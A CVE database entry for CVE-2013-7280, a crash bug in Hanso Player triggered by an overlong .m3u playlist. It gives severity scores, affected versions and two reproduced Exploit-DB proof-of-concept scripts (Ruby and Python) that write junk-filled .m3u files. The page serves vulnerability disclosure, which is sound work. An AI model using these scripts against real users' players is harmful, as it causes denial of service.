CVE-2013-7280
published 2014-01-08CVE-2013-7280: Buffer overflow in HansoTools Hanso Player 2.1.0, 2.5.0, and earlier allows remote attackers to cause a denial of service (crash) via a long string in a .m3u…
PriorityP424medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
5.77%
92.2th percentile
Buffer overflow in HansoTools Hanso Player 2.1.0, 2.5.0, and earlier allows remote attackers to cause a denial of service (crash) via a long string in a .m3u file.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hansotools | hanso_player | <= 2.5.0 | — |
| hansotools | hanso_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Hanso Player 2.5.0 - 'm3u' Buffer Overflow (Denial of Service)
exploitdb·2013-11-05
CVE-2013-7280 Hanso Player 2.5.0 - 'm3u' Buffer Overflow (Denial of Service)
Hanso Player 2.5.0 - 'm3u' Buffer Overflow (Denial of Service)
---
#!/usr/bin/env ruby
# coding:UTF-8
# Exploit Title:Hanso Player 2.5.0 Buffer Overflow
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Vendor :www.hansotools.com
# Software link:http://www.hansotools.com/downloads/hanso-player-setup.exe
# version: 2.5.0
# Tested on: windows XP sp2
DENEME = "\x41" * 240
File.open('hanzo.m3u', 'w') do |bofdosya|
bofdosya.puts (DENEME)
bofdosya.close()
end
Exploit-DB
Hanso Player 2.1.0 - '.m3u' Buffer Overflow
exploitdb·2013-03-01
CVE-2013-7280 Hanso Player 2.1.0 - '.m3u' Buffer Overflow
Hanso Player 2.1.0 - '.m3u' Buffer Overflow
---
#!/usr/bin/python
# Exploit Title:Buffer Overflow Vulnerability Hanso Player version 2.1.0
# Download link :www.hansotools.com/downloads/hanso-player-setup.exe
# Author: metacom
# RST
# version: 2.1.0
# Category: poc
# Tested on: windows 7 German
f=open("fuzzzzz.m3u","w")
print "Creating expoit."
junk="\x41" * 5000
try:
f.write(junk)
f.close()
print "File created"
except:
print "File cannot be created"
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/90816http://packetstormsecurity.com/files/120611/Hanso-Player-2.1.0-Buffer-Overflow.htmlhttp://www.exploit-db.com/exploits/24556http://www.exploit-db.com/exploits/29445http://www.securityfocus.com/bid/58251http://osvdb.org/show/osvdb/90816http://packetstormsecurity.com/files/120611/Hanso-Player-2.1.0-Buffer-Overflow.htmlhttp://www.exploit-db.com/exploits/24556http://www.exploit-db.com/exploits/29445http://www.securityfocus.com/bid/58251
2014-01-08
Published